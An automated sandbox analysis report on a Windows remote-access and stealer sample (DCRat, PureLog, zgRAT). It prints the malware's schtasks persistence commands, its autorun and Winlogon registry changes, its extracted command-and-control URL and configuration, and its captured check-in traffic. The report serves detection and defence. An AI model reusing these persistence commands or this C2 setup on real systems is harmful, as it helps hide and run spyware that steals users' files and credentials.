Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
m4n1AQRhaP.exe

Overview

General Information

Sample name:m4n1AQRhaP.exe
renamed because original name is a hash value
Original sample name:b1af153b79cbbe7c7d3f0992fa692d76.exe
Analysis ID:1639526
MD5:b1af153b79cbbe7c7d3f0992fa692d76
SHA1:fb0cc79ebfc140013af1ba698c76d3fda45d4ea7
SHA256:d1b67660afb5f20cb094275f04bdb44ac8e79bba4f5625ebfc7b1ca5cec71001
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • m4n1AQRhaP.exe (PID: 6756 cmdline: "C:\Users\user\Desktop\m4n1AQRhaP.exe" MD5: B1AF153B79CBBE7C7D3F0992FA692D76)
    • schtasks.exe (PID: 6428 cmdline: schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 5 /tr "'C:\Recovery\upfc.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6420 cmdline: schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Recovery\upfc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6452 cmdline: schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 12 /tr "'C:\Recovery\upfc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • csc.exe (PID: 6472 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 3208 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE7C8.tmp" "c:\Windows\System32\CSC3F2531052F24CCCAD119855F7C96013.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • schtasks.exe (PID: 3336 cmdline: schtasks.exe /create /tn "iHstGpVMr4QFhc62UUbisi" /sc MINUTE /mo 7 /tr "'C:\Recovery\iHstGpVMr4QFhc62UUbis.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 4628 cmdline: schtasks.exe /create /tn "iHstGpVMr4QFhc62UUbis" /sc ONLOGON /tr "'C:\Recovery\iHstGpVMr4QFhc62UUbis.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 3592 cmdline: schtasks.exe /create /tn "iHstGpVMr4QFhc62UUbisi" /sc MINUTE /mo 12 /tr "'C:\Recovery\iHstGpVMr4QFhc62UUbis.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 3956 cmdline: schtasks.exe /create /tn "uwTuxQS3Vu" /sc MINUTE /mo 8 /tr "'C:\Windows\bcastdvr\uwTuxQS3V.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5848 cmdline: schtasks.exe /create /tn "uwTuxQS3V" /sc ONLOGON /tr "'C:\Windows\bcastdvr\uwTuxQS3V.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2860 cmdline: schtasks.exe /create /tn "uwTuxQS3Vu" /sc MINUTE /mo 8 /tr "'C:\Windows\bcastdvr\uwTuxQS3V.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 4616 cmdline: schtasks.exe /create /tn "ikEtBZXIKU1m0Gni" /sc MINUTE /mo 12 /tr "'C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 4288 cmdline: schtasks.exe /create /tn "ikEtBZXIKU1m0Gn" /sc ONLOGON /tr "'C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1796 cmdline: schtasks.exe /create /tn "ikEtBZXIKU1m0Gni" /sc MINUTE /mo 10 /tr "'C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6684 cmdline: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 10 /tr "'C:\Windows\IME\en-GB\Registry.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5156 cmdline: schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Windows\IME\en-GB\Registry.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 3288 cmdline: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 8 /tr "'C:\Windows\IME\en-GB\Registry.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 6844 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ftydHX0xsT.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 6424 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 6420 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • ikEtBZXIKU1m0Gn.exe (PID: 3064 cmdline: "C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe" MD5: B1AF153B79CBBE7C7D3F0992FA692D76)
  • ikEtBZXIKU1m0Gn.exe (PID: 6528 cmdline: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe MD5: B1AF153B79CBBE7C7D3F0992FA692D76)
  • ikEtBZXIKU1m0Gn.exe (PID: 5460 cmdline: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe MD5: B1AF153B79CBBE7C7D3F0992FA692D76)
  • upfc.exe (PID: 908 cmdline: C:\Recovery\upfc.exe MD5: B1AF153B79CBBE7C7D3F0992FA692D76)
  • upfc.exe (PID: 1140 cmdline: C:\Recovery\upfc.exe MD5: B1AF153B79CBBE7C7D3F0992FA692D76)
  • uwTuxQS3V.exe (PID: 5532 cmdline: C:\Windows\bcastdvr\uwTuxQS3V.exe MD5: B1AF153B79CBBE7C7D3F0992FA692D76)
  • uwTuxQS3V.exe (PID: 6924 cmdline: C:\Windows\bcastdvr\uwTuxQS3V.exe MD5: B1AF153B79CBBE7C7D3F0992FA692D76)
  • Registry.exe (PID: 4196 cmdline: C:\Windows\IME\en-GB\Registry.exe MD5: B1AF153B79CBBE7C7D3F0992FA692D76)
  • Registry.exe (PID: 3548 cmdline: C:\Windows\IME\en-GB\Registry.exe MD5: B1AF153B79CBBE7C7D3F0992FA692D76)
  • upfc.exe (PID: 6428 cmdline: "C:\Recovery\upfc.exe" MD5: B1AF153B79CBBE7C7D3F0992FA692D76)
  • cleanup
{"C2 url": "http://83.217.209.253/GameDefault0Api/Geo/ProcesswindowsLine/vm_db/Local/packettraffic/LongpollMulti/videolongpollDatalifedleLocalPublic", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
SourceRuleDescriptionAuthorStrings
m4n1AQRhaP.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    m4n1AQRhaP.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Windows\IME\en-GB\Registry.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Windows\IME\en-GB\Registry.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Windows\bcastdvr\uwTuxQS3V.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Windows\bcastdvr\uwTuxQS3V.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Recovery\iHstGpVMr4QFhc62UUbis.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 5 entries
                SourceRuleDescriptionAuthorStrings
                00000000.00000000.1266049330.0000000000732000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000000.00000002.1332365600.0000000012E67000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    Process Memory Space: m4n1AQRhaP.exe PID: 6756JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Process Memory Space: iHstGpVMr4QFhc62UUbis.exe PID: 6408JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        SourceRuleDescriptionAuthorStrings
                        0.0.m4n1AQRhaP.exe.730000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                          0.0.m4n1AQRhaP.exe.730000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                            System Summary

                            barindex
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\IME\en-GB\Registry.exe, CommandLine: C:\Windows\IME\en-GB\Registry.exe, CommandLine|base64offset|contains: , Image: C:\Windows\IME\en-GB\Registry.exe, NewProcessName: C:\Windows\IME\en-GB\Registry.exe, OriginalFileName: C:\Windows\IME\en-GB\Registry.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1040, ProcessCommandLine: C:\Windows\IME\en-GB\Registry.exe, ProcessId: 4196, ProcessName: Registry.exe
                            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 6472, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Recovery\upfc.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\m4n1AQRhaP.exe, ProcessId: 6756, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Recovery\upfc.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\m4n1AQRhaP.exe, ProcessId: 6756, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\m4n1AQRhaP.exe", ParentImage: C:\Users\user\Desktop\m4n1AQRhaP.exe, ParentProcessId: 6756, ParentProcessName: m4n1AQRhaP.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.cmdline", ProcessId: 6472, ProcessName: csc.exe
                            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\m4n1AQRhaP.exe, ProcessId: 6756, TargetFilename: C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.cmdline

                            Data Obfuscation

                            barindex
                            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\m4n1AQRhaP.exe", ParentImage: C:\Users\user\Desktop\m4n1AQRhaP.exe, ParentProcessId: 6756, ParentProcessName: m4n1AQRhaP.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.cmdline", ProcessId: 6472, ProcessName: csc.exe
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-03-15T19:51:19.415425+010020480951A Network Trojan was detected192.168.2.64970683.217.209.25380TCP
                            2025-03-15T19:52:00.586503+010020480951A Network Trojan was detected192.168.2.64969783.217.209.25380TCP
                            2025-03-15T19:52:30.819403+010020480951A Network Trojan was detected192.168.2.64970083.217.209.25380TCP
                            2025-03-15T19:52:55.772327+010020480951A Network Trojan was detected192.168.2.64970383.217.209.25380TCP
                            2025-03-15T19:53:20.758289+010020480951A Network Trojan was detected192.168.2.64970583.217.209.25380TCP

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Source: m4n1AQRhaP.exeAvira: detected
                            Source: http://83.217.209.253/GameDefault0Api/Geo/ProcesswindowsLine/vm_db/Local/packettraffic/LongpollMulti/videolongpollDatalifedleLocalPublic.phpAvira URL Cloud: Label: malware
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeAvira: detection malicious, Label: TR/Spy.Agent.yhjcg
                            Source: C:\Users\user\Desktop\bJiZPSMv.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                            Source: C:\Recovery\upfc.exeAvira: detection malicious, Label: TR/Spy.Agent.yhjcg
                            Source: C:\Users\user\Desktop\kmqOzLcc.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                            Source: C:\Users\user\Desktop\ZzLYPzhu.logAvira: detection malicious, Label: TR/Spy.KeyLogger.fcrgw
                            Source: C:\Users\user\Desktop\RBEiIUto.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                            Source: C:\Windows\IME\en-GB\Registry.exeAvira: detection malicious, Label: TR/Spy.Agent.yhjcg
                            Source: C:\Users\user\Desktop\MilkDJCZ.logAvira: detection malicious, Label: TR/PSW.Agent.ftabp
                            Source: C:\Users\user\Desktop\qLTnEFIs.logAvira: detection malicious, Label: TR/Spy.KeyLogger.fcrgw
                            Source: C:\Users\user\AppData\Local\Temp\ftydHX0xsT.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeAvira: detection malicious, Label: TR/Spy.Agent.yhjcg
                            Source: C:\Users\user\Desktop\kSqObZEE.logAvira: detection malicious, Label: TR/PSW.Agent.ftabp
                            Source: C:\Users\user\AppData\Local\Temp\OEffu0Lctr.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Users\user\Desktop\ISkSYroH.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                            Source: 00000000.00000002.1332365600.0000000012E67000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://83.217.209.253/GameDefault0Api/Geo/ProcesswindowsLine/vm_db/Local/packettraffic/LongpollMulti/videolongpollDatalifedleLocalPublic", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeReversingLabs: Detection: 80%
                            Source: C:\Recovery\upfc.exeReversingLabs: Detection: 80%
                            Source: C:\Users\user\Desktop\MilkDJCZ.logReversingLabs: Detection: 45%
                            Source: C:\Users\user\Desktop\RBEiIUto.logReversingLabs: Detection: 34%
                            Source: C:\Users\user\Desktop\gXpxUtOK.logReversingLabs: Detection: 37%
                            Source: C:\Users\user\Desktop\kSqObZEE.logReversingLabs: Detection: 45%
                            Source: C:\Users\user\Desktop\kmqOzLcc.logReversingLabs: Detection: 34%
                            Source: C:\Users\user\Desktop\mgFxlINb.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\paINcIrQ.logReversingLabs: Detection: 37%
                            Source: C:\Users\user\Desktop\rCwnUSpv.logReversingLabs: Detection: 25%
                            Source: C:\Windows\IME\en-GB\Registry.exeReversingLabs: Detection: 80%
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeReversingLabs: Detection: 80%
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeReversingLabs: Detection: 80%
                            Source: m4n1AQRhaP.exeVirustotal: Detection: 72%Perma Link
                            Source: m4n1AQRhaP.exeReversingLabs: Detection: 80%
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Source: 00000000.00000002.1332365600.0000000012E67000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"8c7d95c1-4def-4a0e-952b-f3c453358f2e":{"_0":"Desktop|{SYSTEMDRIVE}/Users/{USERNAME}/Desktop/|*.txt;*.doc;*.json|1000|t\nAppData|{SYSTEMDRIVE}/Users/{USERNAME}/AppData/|*.txt;*.doc;*.json|1000|t\nDownloads|{SYSTEMDRIVE}/Users/{USERNAME}/Downloads/|*.txt;*.doc;*.json|1000|t\nDocumentos|{SYSTEMDRIVE}/Users/{USERNAME}/Documentos/|*.txt;*.doc;*.json|1000|t\nDocuments|{SYSTEMDRIVE}/Users/{USERNAME}/Documents/|*.txt;*.doc;*.json|1000|t","_1":"Group name"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account;z8games;crossfire","_1":"150000","_2":"150","_3":"False"}}
                            Source: 00000000.00000002.1332365600.0000000012E67000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["Z4vNlk0NP4VufLuEf2kMvo4oFKtpCyoxZfkKZssHqJIL096zj8QKfvvuAHHb0LKaPiV9ljoxJdflgsyGN4FEidRnuzKSkRQf8r5Rn6O9UcBCQJNRSAN6GG2wQrPvZVM1","ff43a303193c00a678de5ba4183d1959ec3f4e92d3123a05110d3de5f15d096e","0","MARCH_BUILD","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                            Source: 00000000.00000002.1332365600.0000000012E67000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://83.217.209.253/GameDefault0Api/Geo/ProcesswindowsLine/vm_db/Local/packettraffic/LongpollMulti/","videolongpollDatalifedleLocalPublic"]]
                            Source: m4n1AQRhaP.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: m4n1AQRhaP.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: :C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.pdb source: m4n1AQRhaP.exe, 00000000.00000002.1329622101.00000000034BC000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: System.Windows.Forms.pdb2 source: iHstGpVMr4QFhc62UUbis.exe, 0000001B.00000002.1661809574.000000001B847000.00000004.00000020.00020000.00000000.sdmp

                            Spreading

                            barindex
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeCode function: 4x nop then jmp 00007FF88B4C13C6h0_2_00007FF88B4C123D
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 4x nop then jmp 00007FF88B4F13C6h25_2_00007FF88B4F123D
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 4x nop then jmp 00007FF88B5013C6h27_2_00007FF88B50123D
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeCode function: 4x nop then jmp 00007FF88B4F13C6h28_2_00007FF88B4F123D
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeCode function: 4x nop then jmp 00007FF88B4F13C6h29_2_00007FF88B4F123D
                            Source: C:\Recovery\upfc.exeCode function: 4x nop then jmp 00007FF88B4E13C6h30_2_00007FF88B4E123D
                            Source: C:\Recovery\upfc.exeCode function: 4x nop then jmp 00007FF88B4E13C6h31_2_00007FF88B4E123D
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeCode function: 4x nop then jmp 00007FF88B4C13C6h33_2_00007FF88B4C123D
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeCode function: 4x nop then jmp 00007FF88B4F13C6h35_2_00007FF88B4F123D
                            Source: C:\Windows\IME\en-GB\Registry.exeCode function: 4x nop then jmp 00007FF88B4E13C6h38_2_00007FF88B4E123D
                            Source: C:\Windows\IME\en-GB\Registry.exeCode function: 4x nop then jmp 00007FF88B5013C6h39_2_00007FF88B50123D
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeCode function: 4x nop then jmp 00007FF88B4F13C6h41_2_00007FF88B4F123D
                            Source: C:\Recovery\upfc.exeCode function: 4x nop then jmp 00007FF88B4D13C6h42_2_00007FF88B4D123D

                            Networking

                            barindex
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49697 -> 83.217.209.253:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49703 -> 83.217.209.253:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49705 -> 83.217.209.253:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49700 -> 83.217.209.253:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49706 -> 83.217.209.253:80
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: Joe Sandbox ViewASN Name: INF-NET-ASRU INF-NET-ASRU
                            Source: global trafficHTTP traffic detected: POST /GameDefault0Api/Geo/ProcesswindowsLine/vm_db/Local/packettraffic/LongpollMulti/videolongpollDatalifedleLocalPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 83.217.209.253Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /GameDefault0Api/Geo/ProcesswindowsLine/vm_db/Local/packettraffic/LongpollMulti/videolongpollDatalifedleLocalPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 83.217.209.253Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /GameDefault0Api/Geo/ProcesswindowsLine/vm_db/Local/packettraffic/LongpollMulti/videolongpollDatalifedleLocalPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 83.217.209.253Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /GameDefault0Api/Geo/ProcesswindowsLine/vm_db/Local/packettraffic/LongpollMulti/videolongpollDatalifedleLocalPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 83.217.209.253Content-Length: 344Expect: 100-continueConnection: Keep-Alive
